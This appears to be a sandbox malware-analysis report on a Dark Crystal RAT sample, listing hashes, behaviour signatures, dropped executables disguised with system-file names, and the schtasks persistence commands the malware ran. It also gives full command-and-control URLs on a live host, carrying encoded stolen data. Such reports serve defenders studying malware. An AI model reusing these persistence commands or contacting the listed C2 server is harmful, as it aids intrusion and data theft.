File name:

DCRatBuild.exe

Full analysis: https://app.any.run/tasks/7c61371f-2436-4610-8bf3-38aa42d7def7
Verdict: Malicious activity
Threats:

DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common.

Analysis date: January 10, 2025, 21:17:23
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
dcrat
rat
remote
darkcrystal
stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:

518D0AA5E39A3F9719EE24B749874CDD

SHA1:

0E5B22A0B89767587876E1B36E0E8FC2FCB4E524

SHA256:

1BC34DDE181115BBD21149823170AC3FC0D70009ACD2CB75D48D54736F68E108

SSDEEP:

12288:VWjGLA4uDgDZrLWkzDNhCa287MochrSvUJZVVVVVVVVVAtVVVUvPIwuZJSxqZRCp:HZPrK87M5rSv0lvPZuvCxaC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 6232)
    • DCRAT mutex has been found

      • chainreview.exe (PID: 6844)
      • ctfmon.exe (PID: 3928)
    • DARKCRYSTAL has been detected (SURICATA)

      • ctfmon.exe (PID: 3928)
    • Actions looks like stealing of personal data

      • ctfmon.exe (PID: 3928)
    • Connects to the CnC server

      • ctfmon.exe (PID: 3928)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • DCRatBuild.exe (PID: 4864)
      • chainreview.exe (PID: 6844)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 6232)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6232)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 6232)
    • Executed via WMI

      • schtasks.exe (PID: 6952)
      • schtasks.exe (PID: 7036)
      • schtasks.exe (PID: 6988)
      • schtasks.exe (PID: 7012)
      • schtasks.exe (PID: 7052)
      • schtasks.exe (PID: 6972)
      • schtasks.exe (PID: 7080)
      • schtasks.exe (PID: 7144)
      • schtasks.exe (PID: 7160)
      • schtasks.exe (PID: 5200)
      • schtasks.exe (PID: 7096)
      • schtasks.exe (PID: 5628)
      • schtasks.exe (PID: 7116)
      • schtasks.exe (PID: 3092)
      • schtasks.exe (PID: 4300)
      • schtasks.exe (PID: 3984)
      • schtasks.exe (PID: 3772)
      • schtasks.exe (PID: 4160)
      • schtasks.exe (PID: 6012)
      • schtasks.exe (PID: 3564)
      • schtasks.exe (PID: 5888)
      • schtasks.exe (PID: 936)
      • schtasks.exe (PID: 748)
      • schtasks.exe (PID: 5696)
      • schtasks.exe (PID: 624)
      • schtasks.exe (PID: 4512)
      • schtasks.exe (PID: 5308)
      • schtasks.exe (PID: 4640)
      • schtasks.exe (PID: 4548)
      • schtasks.exe (PID: 4704)
      • schtasks.exe (PID: 5320)
      • schtasks.exe (PID: 5460)
      • schtasks.exe (PID: 2676)
      • schtasks.exe (PID: 2008)
      • schtasks.exe (PID: 4400)
      • schtasks.exe (PID: 6284)
      • schtasks.exe (PID: 5340)
      • schtasks.exe (PID: 6404)
      • schtasks.exe (PID: 6528)
      • schtasks.exe (PID: 6736)
      • schtasks.exe (PID: 6388)
      • schtasks.exe (PID: 6724)
      • schtasks.exe (PID: 6532)
      • schtasks.exe (PID: 6372)
      • schtasks.exe (PID: 6436)
    • The process creates files with name similar to system file names

      • chainreview.exe (PID: 6844)
    • Likely accesses (executes) a file from the Public directory

      • schtasks.exe (PID: 5340)
      • schtasks.exe (PID: 6528)
      • schtasks.exe (PID: 6404)
    • Starts itself from another location

      • chainreview.exe (PID: 6844)
    • Contacting a server suspected of hosting an CnC

      • ctfmon.exe (PID: 3928)
  • INFO

    • Reads the computer name

      • DCRatBuild.exe (PID: 4864)
    • The sample compiled with english language support

      • DCRatBuild.exe (PID: 4864)
      • chainreview.exe (PID: 6844)
    • Checks supported languages

      • DCRatBuild.exe (PID: 4864)
      • chainreview.exe (PID: 6844)
      • ctfmon.exe (PID: 3928)
    • Failed to create an executable file in Windows directory

      • chainreview.exe (PID: 6844)
    • Disables trace logs

      • ctfmon.exe (PID: 3928)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x1ec40
UninitializedDataSize: -
InitializedDataSize: 255488
CodeSize: 201216
LinkerVersion: 14
PEType: PE32
ImageFileCharacteristics: Executable, 32-bit
TimeStamp: 2020:12:01 18:00:55+00:00
MachineType: Intel 386 or later, and compatibles
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
176
Monitored processes
51
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start dcratbuild.exe wscript.exe no specs cmd.exe no specs conhost.exe no specs #DCRAT chainreview.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs #DCRAT ctfmon.exe

Process information

PID
CMD
Path
Indicators
Parent process
4864"C:\Users\admin\AppData\Local\Temp\DCRatBuild.exe" C:\Users\admin\AppData\Local\Temp\DCRatBuild.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\dcratbuild.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.3996_none_d954cb49e10154a6\gdiplus.dll
6232"C:\WINDOWS\System32\WScript.exe" "C:\SurrogateSessioncommon\H64kBfMKQNZHGYpAaq8bCkBE8.vbe" C:\Windows\SysWOW64\wscript.exeDCRatBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6784C:\WINDOWS\system32\cmd.exe /c ""C:\SurrogateSessioncommon\thbmTw2pjRZvcHsUGy.bat" "C:\Windows\SysWOW64\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
6796\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6844"C:\SurrogateSessioncommon\chainreview.exe"C:\SurrogateSessioncommon\chainreview.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Version:
5.15.2.0
Modules
Images
c:\surrogatesessioncommon\chainreview.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
6952schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\SurrogateSessioncommon\SystemSettings.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6972schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\SurrogateSessioncommon\SystemSettings.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6988schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\SurrogateSessioncommon\SystemSettings.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7012schtasks.exe /create /tn "MusNotificationM" /sc MINUTE /mo 7 /tr "'C:\SurrogateSessioncommon\MusNotification.exe'" /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7036schtasks.exe /create /tn "MusNotification" /sc ONLOGON /tr "'C:\SurrogateSessioncommon\MusNotification.exe'" /rl HIGHEST /fC:\Windows\System32\schtasks.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
4 159
Read events
4 142
Write events
17
Delete events
0

Modification events

(PID) Process:(4864) DCRatBuild.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:writeName:VBEFile
Value:
(PID) Process:(6844) chainreview.exeKey:HKEY_CURRENT_USER\SOFTWARE\ede9d3f1760488ad72f81ec33ce28456947fd121
Operation:writeName:7a7bef15d456479a31a6f1ab24c47bd316c632f5
Value:
WyJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcY2hhaW5yZXZpZXcuZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXFN5c3RlbVNldHRpbmdzLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxNdXNOb3RpZmljYXRpb24uZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXFN5c3RlbVNldHRpbmdzLmV4ZSIsIkM6XFxVc2Vyc1xcRGVmYXVsdFxcVmlkZW9zXFxTeXN0ZW1TZXR0aW5ncy5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcc3Bvb2xzdi5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcZHdtLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFx3aW5pbml0LmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxkd20uZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXHRhc2tob3N0dy5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcY3RmbW9uLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxPZmZpY2VDbGlja1RvUnVuLmV4ZSIsIkM6XFxTdXJyb2dhdGVTZXNzaW9uY29tbW9uXFxiYWNrZ3JvdW5kVGFza0hvc3QuZXhlIiwiQzpcXFVzZXJzXFxQdWJsaWNcXERvY3VtZW50c1xcd2luaW5pdC5leGUiLCJDOlxcU3Vycm9nYXRlU2Vzc2lvbmNvbW1vblxcZm9udGRydmhvc3QuZXhlIiwiQzpcXFN1cnJvZ2F0ZVNlc3Npb25jb21tb25cXGNvbmhvc3QuZXhlIl0=
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3928) ctfmon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ctfmon_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
Executable files
14
Suspicious files
1
Text files
14
Unknown types
0

Dropped files

PID
Process
Filename
Type
6844chainreview.exeC:\Users\Default\Videos\SystemSettings.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\wininit.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\SystemSettings.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\dwm.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\26c12092da979ctext
MD5:FEE6EB484C1F8A8313C9941832AA4C32
SHA256:20C0A030BB30744AF1ECE0BD17E4514B0E87989E9455EEFC38D7188A439E1FAB
6844chainreview.exeC:\SurrogateSessioncommon\ctfmon.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\ea9f0e6c9e2dcdtext
MD5:D1B51C4E8E3F810737512BF0A5C1AD3A
SHA256:8B95DFE1948124757E76CD331A9B75CEBFCBC8B2708A46F072C8BC0B0E43F4E3
6844chainreview.exeC:\SurrogateSessioncommon\MusNotification.exeexecutable
MD5:D209FBBD47A895FF722028B81C204926
SHA256:2A4A668C5560121458A63D15075EB9512929A279F30ED2B29B62C2342B5EA743
6844chainreview.exeC:\SurrogateSessioncommon\f3b6ecef712a24text
MD5:AE6C5D21734D22555E98864605B9973A
SHA256:05C0E70D8A92B44C3135E83C5F314F8B3F18CBE081C5F9AC9D6640C7664B4781
6844chainreview.exeC:\SurrogateSessioncommon\aa97147c4c782dtext
MD5:2109D38BFCC0A1B0BC2D4F3587B6FBCB
SHA256:7AB5B902C416B487BD4D8BA0A1FE62AE9E527C2F783FFEBB5FECCC69A0BF7B0F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
83
TCP/UDP connections
37
DNS requests
19
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3928
ctfmon.exe
GET
200
94.198.223.74:80
http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&f2412832b8db191734a6421eea1e0a91=d1nI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W&245d677051a5fd9542fc1d9be47be37f=0VfiIiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZHZXllasdUYElzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaJpWT0QTeOVDMDxEeVpnT1NmeNl2bqlka5ckYpdXaJRlVslkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMl2YE1Ue0kXT4lkaMBTSqxkMFpWTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI1cTNyIjYkJTY2IWNjBTZ1cjN2EGMyMWOxEzY2MDOwUGMkZWM4MWYlJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W
unknown
whitelisted
3928
ctfmon.exe
GET
200
94.198.223.74:80
http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&f2412832b8db191734a6421eea1e0a91=d1nI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W&245d677051a5fd9542fc1d9be47be37f=0VfiIiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZHZXllasdUYElzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaJpWT0QTeOVDMDxEeVpnT1NmeNl2bqlka5ckYpdXaJRlVslkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMl2YE1Ue0kXT4lkaMBTSqxkMFpWTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI1cTNyIjYkJTY2IWNjBTZ1cjN2EGMyMWOxEzY2MDOwUGMkZWM4MWYlJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W
unknown
whitelisted
3928
ctfmon.exe
GET
200
94.198.223.74:80
http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&32b56fe672c0b08595e6e68bdec51114=d1nIw4WS1lzViRXOykVd5cVY65EWaRlVHRGakJjY5pEWkRFeGhlNNtWS2k0QhBjRHVVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQGpVe5ITW6x2RSl2dplUavpWSvJFWZFVMXlVekdlWzZ1RWl2dplUavpWS6JESjJUMXlFbSNTVpdXaJVHZzIWd01mYWpUaPlWUVNVeWJzYWFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2TplEWapnVWJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTS5pVdGdEV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWSvJFWZFVMXlFbSNTVpdXaJZHbHpVMGVUSzsmeKRkRFlkcWdEZzZ0VaNlQTxUenNUS1xWRJxWNXFWT1cEW5hnVkJkQ55UNjlXUCJUehxmUIJGaW1WVnBTaN9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiIyEDZ5UjN5kzN0UmM1UDNkVDZzIDZjNmNkJDN4I2YhZGOmRjN1E2N4IiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W
unknown
whitelisted
3928
ctfmon.exe
GET
200
94.198.223.74:80
